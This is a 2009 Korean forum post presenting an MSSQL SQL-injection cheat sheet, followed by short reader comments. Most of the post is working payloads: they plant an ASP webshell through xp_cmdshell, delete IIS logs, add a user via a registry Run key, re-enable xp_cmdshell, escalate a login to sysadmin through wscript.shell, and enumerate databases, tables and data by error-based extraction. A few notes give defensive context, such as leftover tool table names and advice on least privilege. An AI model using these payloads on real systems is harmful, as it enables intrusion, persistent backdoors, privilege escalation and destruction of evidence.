   subroutine
   http://blog.naver.com/31337__
   sql 인젝션 공격기법

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1177 [복사]


#########################################
# SQL Injection에 의해 자주 생성되는 테이블 명
# (점검 참고: 운영 DB에 아래 이름의 테이블이 남아 있으면 SQL 인젝션 도구가 실행된 흔적일 수 있으므로, 테이블 생성 시각과 웹 서버 로그를 함께 확인한다)
#########################################
D99_CMD, D99_REG, D99_Tmp, DIY_TEMPCOMMAND_TABLE, t_jiaozhu, Siwebtmp,
NB_Commander_Tmp, comd_list, Reg_Arrt,  jiaozhu, Reg_Arrt, xiaopan, DIY_TEMPTABLE,
heige, kill_kk, SC_LOG, SC_TRAN



########################################
# CHECK
#########################################

and 1=(select @@version) //version

and 1=(IS_SRVROLEMEMBER('sysadmin')) // 서버 역할 소속 여부(sysadmin,dbcreator,diskadmin,processadmin,serveradmin,setupadmin,securityadmin)
and 1=(IS_MEMBER('db_owner')) // 현재 DB의 역할 소속 여부

;declare @a int;--  // 사용여부
and 0<>db_name() // DB명
and user>0 // USER명

#########################################
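# 중국 해커들이 애용하는 공격패턴
# (방어 참고: 아래 구문은 대부분 웹 애플리케이션의 DB 계정이 sysadmin 권한이나 해당 확장 프로시저 실행 권한을 가질 때만 동작하므로, 최소 권한 계정 사용과 xp_cmdshell·OLE Automation 프로시저 비활성화가 기본 대책이다. 로그 삭제 예가 포함되어 있으므로 웹 로그는 별도 서버에도 보존한다)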
#########################################

;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- // File
;exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt' // LOG
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add' // Registry

DROP TABLE kill_kk;CREATE TABLE kill_kk(subdirectory VARCHAR(100)윕
depth VARCHAR(100)윕[file] VARCHAR(100)) Insert kill_kk
exec master..xp_dirtree "D:/"윕 1윕1-- // Table 생성

DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

#########################################
# 공격 시나리오
#########################################

;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt+char(124) End from (Select Top 1 id,ResultTxt from [X_5450] order by [id]) T order by [id] desc)>0


;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

;CREATE TABLE [X_5450]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [X_5450](ResultTxt) exec master.dbo.xp_cmdshell 'dir c:';insert into [X_5450] values ('g_over');exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addsrvrolemember dir c:,sysadmin"'--

;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addlogin dir c:,xiaoxue"'--

;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

#########################################
# 기타 쿼리문
#########################################

모든 db명 쿼리하기
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 1=(select name from master.dbo.sysdatabases where dbid=8)

특정db에서 사용자가 만든 테이블명 불러오기
and 0<>(select top 1 name from snortids.dbo.sysobjects where xtype=char(85))
and 0<>(select top 1 name from (select top 행증가 name from .dbo.sysobjects where xtype='U' order by name asc) as table1 order by name desc)

테이블의 컬럼정보 불러오기

특정 테이블고유ID 가져오기(char(97)+char(98)+char(99)=abc) 1061578820
and 0<>(select count(*) from snortids.dbo.sysobjects where xtype='U' and name=char(97)+char(99)+char(105)+char(100)+char(95)+char(101)+char(118)+char(101)+char(110)+char(116) and uid>(str(id)))

컬럼명 가져오기
and 0<>(select top 1 name from snortids.dbo.syscolumns where id=1061578820)
and 0<>(select top 1 name from (select top 행증가 name from snortids.dbo.syscolumns where id=1061578820 order by name asc) as table1 order by name desc)

데이터 가져오기
and 0<>(select top 1 char(94)+Cast(sig_name as varchar(8000))+char(94) from SnortIDS..acid_event)
and 0<>(select top 1 char(94)+Cast(컬럼명 as varchar(8000))+char(94) from SnortIDS..acid_event where 컬럼명 not in('이미얻은내용'))
and 0<>(select top 1 char(94)+Cast(컬럼명 as varchar(8000))+char(94) from (select top 행수 컬럼명 from SnortIDS.dbo.acid_event order by 컬럼명 asc) as table1 order by 컬럼명 desc)

-subroutine-

  Hit : 18468     Date : 2009/01/11 01:52



    
BHM D99_CMD, D99_REG, D99_Tmp, DIY_TEMPCOMMAND_TABLE, t_jiaozhu, Siwebtmp,
NB_Commander_Tmp, comd_list, Reg_Arrt, jiaozhu, Reg_Arrt, xiaopan, DIY_TEMPTABLE,
heige, kill_kk, SC_LOG, SC_TRAN -- 대부분이 阿D,NB 란 툴에서 생성된 테이블명이군...쩝쩝
2009/01/19  
zhuji90 무슨 언어인가요...? 2009/02/09  
팬더고은 ㅇㅅㅇ..신기하네요 2009/07/10  
xodnr631 살짝 읽을만 하네요, 감사합니다. 2010/09/24  